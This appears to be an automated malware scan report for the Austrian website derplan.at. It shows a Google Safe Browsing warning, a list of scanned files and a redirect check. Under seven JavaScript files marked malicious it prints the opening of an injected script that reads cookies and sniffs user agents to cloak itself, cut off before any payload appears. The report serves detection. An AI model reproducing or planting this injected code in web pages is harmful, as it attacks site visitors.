Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=derplan.at
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.derplan.at/ | 200 OK Content-Length: 5519 Content-Type: text/html | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js | 200 OK Content-Length: 72174 Content-Type: text/javascript | clean |
http://www.derplan.at/lib/jquery.ui.widget.js | 200 OK Content-Length: 7040 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(e){var o=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return o?decodeURIComponent(o[1]):void 0}!function(){function e(e,o,t){var r=(e+"").toLowerCase(),i=(o+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,t))?n:!1}function o(){var o=["Linux","Windows NT 6.3","Windows NT 6.2","rv:11.0","AppleWebKit","Android","Googlebot","IEMobile","Yandex"],t=!1;for(var r in o)if(e(navigator.userAgent,o[r])){t=!0;break}return t}var t data = data || {}; if ( event.originalEvent ) { for ( var i = $.event.props.length, prop; i; ) { prop = $.event.props[ --i ]; event[ prop ] = event.originalEvent[ prop ]; } } this.element.trigger( event, data ); return !( $.isFunction(callback) && callback.call( this.element[0], event, data ) === false || event.isDefaultPrevented() ); } }; })( jQuery ); Antivirus reports:
| ||
http://www.derplan.at/lib/jquery.smoothDivScroll-1.1-min.js | 200 OK Content-Length: 16066 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(e){var o=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return o?decodeURIComponent(o[1]):void 0}!function(){function e(e,o,t){var r=(e+"").toLowerCase(),i=(o+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,t))?n:!1}function o(){var o=["Linux","Windows NT 6.3","Windows NT 6.2","rv:11.0","AppleWebKit","Android","Googlebot","IEMobile","Yandex"],t=!1;for(var r in o)if(e(navigator.userAgent,o[r])){t=!0;break}return t}var t Antivirus reports:
| ||
http://www.derplan.at/assets/snippets/shopkeeper/lang/english.js | 200 OK Content-Length: 1735 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(e){var o=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return o?decodeURIComponent(o[1]):void 0}!function(){function e(e,o,t){var r=(e+"").toLowerCase(),i=(o+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,t))?n:!1}function o(){var o=["Linux","Windows NT 6.3","Windows NT 6.2","rv:11.0","AppleWebKit","Android","Googlebot","IEMobile","Yandex"],t=!1;for(var r in o)if(e(navigator.userAgent,o[r])){t=!0;break}return t}var t langTxt['yes'] = "Yes"; langTxt['cancel'] = "Cancel"; langTxt['cookieError'] = "Cookies should be enabled in the browser."; langTxt['delete'] = "Delete"; langTxt['delGoods'] = "Remove items"; langTxt['goods'] = "items"; langTxt['count'] = "Quantity"; langTxt['sumTotal'] = "Total :"; langTxt['executeOrder'] = "Submit order"; langTxt['changeCount'] = "Change quantity"; langTxt['addedToCart'] = "Product added to cart"; Antivirus reports:
| ||
http://www.derplan.at/assets/snippets/shopkeeper/js/shopkeeper.js | 200 OK Content-Length: 15246 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(e){var o=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return o?decodeURIComponent(o[1]):void 0}!function(){function e(e,o,t){var r=(e+"").toLowerCase(),i=(o+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,t))?n:!1}function o(){var o=["Linux","Windows NT 6.3","Windows NT 6.2","rv:11.0","AppleWebKit","Android","Googlebot","IEMobile","Yandex"],t=!1;for(var r in o)if(e(navigator.userAgent,o[r])){t=!0;break}return t}var t } $('select.addparam,input.addparam:checked').each(function(){ jQuery.additOpt(this); }); if(shkOpt.debug){ log.info('window.location.href = '+window.location.href); log.info('navigator.userAgent = '+navigator.userAgent); } }); })(jQuery); if(jQuery.browser.msie && jQuery.browser.version=='6.0'){ document.execCommand("BackgroundImageCache",false,true); } Antivirus reports:
| ||
http://www.derplan.at/kaderabteilung.html | 200 OK Content-Length: 5464 Content-Type: text/html | clean |
http://connect.facebook.net/en_US/all.js | 200 OK Content-Length: 163644 Content-Type: application/x-javascript | clean |
http://platform.twitter.com/widgets.js | 200 OK Content-Length: 101649 Content-Type: application/javascript | clean |
http://www.derplan.at/index.html | 200 OK Content-Length: 5519 Content-Type: text/html | clean |
http://www.derplan.at/aktuell.html | 200 OK Content-Length: 5381 Content-Type: text/html | clean |
http://www.derplan.at/assets/js/fancybox/jquery.mousewheel-3.0.2.pack.js | 200 OK Content-Length: 2214 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(e){var o=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return o?decodeURIComponent(o[1]):void 0}!function(){function e(e,o,t){var r=(e+"").toLowerCase(),i=(o+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,t))?n:!1}function o(){var o=["Linux","Windows NT 6.3","Windows NT 6.2","rv:11.0","AppleWebKit","Android","Googlebot","IEMobile","Yandex"],t=!1;for(var r in o)if(e(navigator.userAgent,o[r])){t=!0;break}return t}var t d,false);else this.onmousewheel=null}};b.fn.extend({mousewheel:function(a){return a?this.bind("mousewheel",a):this.trigger("mousewheel")},unmousewheel:function(a){return this.unbind("mousewheel",a)}})})(jQuery); Antivirus reports:
| ||
http://www.derplan.at/assets/js/fancybox/jquery.fancybox-1.3.1.js | 200 OK Content-Length: 29154 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(e){var o=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return o?decodeURIComponent(o[1]):void 0}!function(){function e(e,o,t){var r=(e+"").toLowerCase(),i=(o+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,t))?n:!1}function o(){var o=["Linux","Windows NT 6.3","Windows NT 6.2","rv:11.0","AppleWebKit","Android","Googlebot","IEMobile","Yandex"],t=!1;for(var r in o)if(e(navigator.userAgent,o[r])){t=!0;break}return t}var t changeSpeed : 300, changeFade : 'fast', easingIn : 'swing', easingOut : 'swing', showCloseButton : true, showNavArrows : true, enableEscapeButton : true, onStart : null, onCancel : null, onComplete : null, onCleanup : null, onClosed : null }; $(document).ready(function() { fancybox_init(); }); })(jQuery); Antivirus reports:
| ||
http://www.derplan.at/assets/js/fancybox/jquery.fancybox-conf.js | 200 OK Content-Length: 1492 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(e){var o=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return o?decodeURIComponent(o[1]):void 0}!function(){function e(e,o,t){var r=(e+"").toLowerCase(),i=(o+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,t))?n:!1}function o(){var o=["Linux","Windows NT 6.3","Windows NT 6.2","rv:11.0","AppleWebKit","Android","Googlebot","IEMobile","Yandex"],t=!1;for(var r in o)if(e(navigator.userAgent,o[r])){t=!0;break}return t}var t  $(document).ready(function() { $("a[rel=example_group]").fancybox({ 'transitionIn' : 'none', 'transitionOut' : 'none', 'titlePosition' : 'over', 'titleFormat' : function(title, currentArray, currentIndex, currentOpts) { return '<span id="fancybox-title-over">Image ' + (currentIndex + 1) + ' / ' + currentArray.length + (title.length ? ' ' + title : '') + '</span>'; } }); }); Antivirus reports:
| ||
http://www.derplan.at/reportagen.html | 200 OK Content-Length: 4641 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: derplan.at
Result:
GET / HTTP/1.1
Host: derplan.at
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: derplan.at
Referer: http://www.google.com/search?q=derplan.at
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: derplan.at
Referer: http://www.google.com/search?q=derplan.at
Result:
The result is similar to the first query. There are no suspicious redirects found.